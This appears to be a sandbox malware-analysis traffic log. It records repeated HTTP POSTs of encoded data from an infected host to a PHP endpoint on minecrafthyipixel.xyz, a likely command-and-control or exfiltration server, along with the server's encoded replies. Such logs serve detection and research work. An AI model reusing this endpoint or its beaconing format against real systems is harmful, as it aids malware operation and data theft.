                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:44:07.142115116 CEST  362  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:07.247148991 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:07.247411966 CEST  2512  OUT  Data Raw: 52 5d 5b 5f 59 4b 54 5d 5c 5e 59 59 57 51 58 59 54 50 5f 58 54 59 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][_YKT]\^YYWQXYTP_XTYS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2--"/0000+%W=?X':$1("#2Q*7<,\-%$[. X =
                                                                                                                                    Apr 19, 2024 13:44:07.522196054 CEST  623  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:07 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BAmg7idYH3ox2dny77ZX6xOgU7irkl8bb4kkTf%2BBd3j8HTX%2Fdkmdd4ZZ9vtBSAv%2BQtNtSQEXXcmKDmdtPbYlPAyWT2ce6R3XubeIO%2FLSqRhXMxJt3KLoISIysBSjAr5JIWzmM6QRGA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca40cfded6765-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:07.522259951 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                    146  192.168.2.4  49900  104.21.57.61  80
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:44:07.747348070 CEST  362  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:07.851892948 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:07.852009058 CEST  2512  OUT  Data Raw: 57 58 5e 5c 5c 41 54 5f 5c 5e 59 59 57 53 58 53 54 51 5f 5a 54 58 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^\\AT_\^YYWSXSTQ_ZTXS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2&W!'0$35Q=?]%:/%]*R#2+8<#<,:$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:08.131608009 CEST  625  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akhmSsCL3HOE7EhJrT8eDmLfZWJkVH2Z582qmZz9MVzsD%2BXSdVfhxuiY8nsa%2B1yKfzXCKDMPkEPnYkJ45LswouhZTYy7%2BaqdcLV5Sq%2BiK65C29yLC%2FUCFc5w2H0%2Bc8IPpSDymZuSnHk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca410c8b37bd5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:08.131669998 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                    147  192.168.2.4  49901  104.21.57.61  80
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:44:08.356673002 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:08.461838007 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:08.462030888 CEST  2504  OUT  Data Raw: 52 5e 5b 5c 59 47 54 5d 5c 5e 59 59 57 57 58 5a 54 5a 5f 58 54 58 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[\YGT]\^YYWWXZTZ_XTXS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'."U5+4Z3#80V*+#]198S&27%>+ Z/.$[. X !
                                                                                                                                    Apr 19, 2024 13:44:08.738712072 CEST  623  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATEUSY7%2FfxzqWFwdDiE0E2G53DWAwKM5meRh7RRh8Q0Iq3WESuSR9QMQSiEhi%2BFyzyhuCSZk0LcqZh%2FF11mUwEEeGWXMDuzos1H5gBdGGRgiHDZwrdjwYhBCTuQviimVqW4%2FHRmrN%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4149f0c06e6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:08.738780022 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                    148  192.168.2.4  49902  104.21.57.61  80
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:44:08.979562998 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:09.084722996 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:09.087670088 CEST  2512  OUT  Data Raw: 52 5d 5b 5b 59 44 54 5e 5c 5e 59 59 57 50 58 5e 54 53 5f 5c 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][[YDT^\^YYWPX^TS_\T^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_25"73#[';)Q>;X'* V&(-#1-+(?7,8].$[. X
                                                                                                                                    Apr 19, 2024 13:44:09.343632936 CEST  615  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbK55HKx7EuLcREsEAbuW6lBTYXBBO%2BD05WTUG0EdAeg9vNY1WjtEfx0mCWmsW0eN3AdqU9p7WITxOfRAeoS49HVz8D606RfbhCGeHjWxI4jdO4bw6cyV4WOSKOik9rW0ZnKt1KqR8s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4187f654566-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:09.343700886 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                    149  192.168.2.4  49903  104.21.57.61  80
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:44:09.558749914 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:09.663471937 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:09.663620949 CEST  2512  OUT  Data Raw: 57 5a 5b 58 5c 44 51 5d 5c 5e 59 59 57 53 58 5d 54 53 5f 59 54 5c 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[X\DQ]\^YYWSX]TS_YT\SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1"R5( 'V;Z0(2=8;20T&(57T6V=Z#?$-%$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:10.021815062 CEST  623  IN  HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FFlXbL3Q4eI2SrVUvGDbNAu%2BHogJZI9VtoszIC%2BAa4rbH6hYbIOC37Y9gFTASJenaD0tdOXTXNQmi8A60lXRly0HWApzBjAdCwuK3GMaoAWZrMLdW%2FRT3NvGntMwemBhJ%2Bk9JiCgnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca41c18a212f1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:10.021847010 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                    150  192.168.2.4  49904  104.21.57.61  80
                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                    Apr 19, 2024 13:44:10.247252941 CEST  386  OUT  POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:10.352298021 CEST  25  IN  HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:10.352530003 CEST  2512  OUT  Data Raw: 57 5d 5e 55 5c 40 54 5a 5c 5e 59 59 57 53 58 53 54 52 5f 5e 54 59 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^U\@TZ\^YYWSXSTR_^TYSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2>T" ' '=);%/%+1#1)8'7<89$[. X 5
Apr 19, 2024 13:44:10.726248980 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCw3%2F2kWUTmt1I6FLUDdlvbPZs5dRutVHdE0wWqPqIYG46BmlgfN8l4eWF5fM%2Bn8cThSW8Hp8seNe19iPvwJ41jc3ntl1PAPPlxg0mw%2FreWyVtQ2bknJcnLo%2FnKeFTgFTHes8rPwzt8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca420691a458e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:10.726309061 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
151 | 192.168.2.4 | 49905 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:10.951617956 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:11.057091951 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:11.059657097 CEST | 2512 | OUT | Data Raw: 57 5a 5b 58 59 46 54 5f 5c 5e 59 59 57 5f 58 5d 54 54 5f 5e 54 5d 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[XYFT_\^YYW_X]TT_^T]S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z'=*U6,0]$+>\2:$U&8"P 2=/4?3.$[. X
Apr 19, 2024 13:44:11.413799047 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:11 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FMBqMxhTpFbfB2HXFj242jd442YDUzqi7lZJNGLWM%2BWhFLN9u6T%2Bcn3LlkfAGA5aUpF0HgYwzvLDH4y4Sj6hKdUBxmFTaaCP%2FsFc%2BMxYtKpCgwakJ9L0%2FFoVpOsP2R7%2BzOr%2F164b3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca424cbe112cf-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:11.413853884 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
152 | 192.168.2.4 | 49906 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:11.782747984 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:11.888900042 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:11.889077902 CEST | 2504 | OUT | Data Raw: 52 5a 5b 5c 5c 43 51 5f 5c 5e 59 59 57 57 58 5f 54 53 5f 59 54 5e 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[\\CQ_\^YYWWX_TS_YT^S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2=2W +'$43]-V=+19($864!))\"/8-$[. X 5
Apr 19, 2024 13:44:12.141175985 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:12 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEnTqIfeAhZ7zXcTUZ7CBYD4cDzBQWfMB%2FxkIDATEQxmpCJ3UnuYi6%2BG38weI2537Nl%2FyouTZ3HC8%2FCk6K8wIDdGruGYI6BwXFZJM%2FjChXvIGgXrYtqigpvhoZYeUb8tXOHaXDhois8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca429fcfa53ba-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:12.141271114 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
153 | 192.168.2.4 | 49907 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:11.801305056 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:11.906125069 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:11.906224012 CEST | 2192 | OUT | Data Raw: 57 5f 5e 55 5c 40 51 5f 5c 5e 59 59 57 53 58 5f 54 50 5f 5e 54 5a 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^U\@Q_\^YYWSX_TP_^TZS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&*6(Z3$$+)Q)&$U&+%712W=]47,.5$[. X 5
Apr 19, 2024 13:44:12.167299986 CEST | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:12 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kbojBJfCUw5%2FILHotYXm0gFfimOsYHZOtgMh2rMBHPnk93MSFbwV04NqN6uC4CEhMnK%2BJk%2BAGXbNdLV4CgBw8DnGSNxmL53wDxdVYrxY1IV5l4O6aheAWD7hltpY9G6TuVrW7rjZN8I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca42a18c1b0ac-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5f 30 26 36 16 20 29 3c 02 2b 33 0c 58 29 51 22 04 2a 00 26 02 37 3d 2b 0e 38 04 2b 03 28 3b 39 07 31 0d 0f 57 26 3d 30 56 32 30 21 59 00 1a 39 58 22 3c 25 58 2d 07 2d 58 2b 1f 2e 07 37 1c 3c 07 3f 00 2a 0d 23 16 0e 03 3c 00 25 51 2f 16 2c 56 3c 06 2a 07 38 0e 26 14 36 3b 2c 52 09 12 26 08 3c 16 24 59 25 0e 00 09 34 57 27 01 3f 11 3a 5b 24 15 01 0f 25 55 28 17 3a 0c 0c 56 31 10 0b 1d 3e 14 20 56 23 05 2a 09 31 3e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$_0&6 )<+3X)Q"*&7=+8+(;91W&=0V20!Y9X"<%X--X+.7<?*#<%Q/,V<*8&6;,R&<$Y%4W'?:[$%U(:V1> V#*1>.^,+H0TW
Apr 19, 2024 13:44:12.167359114 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
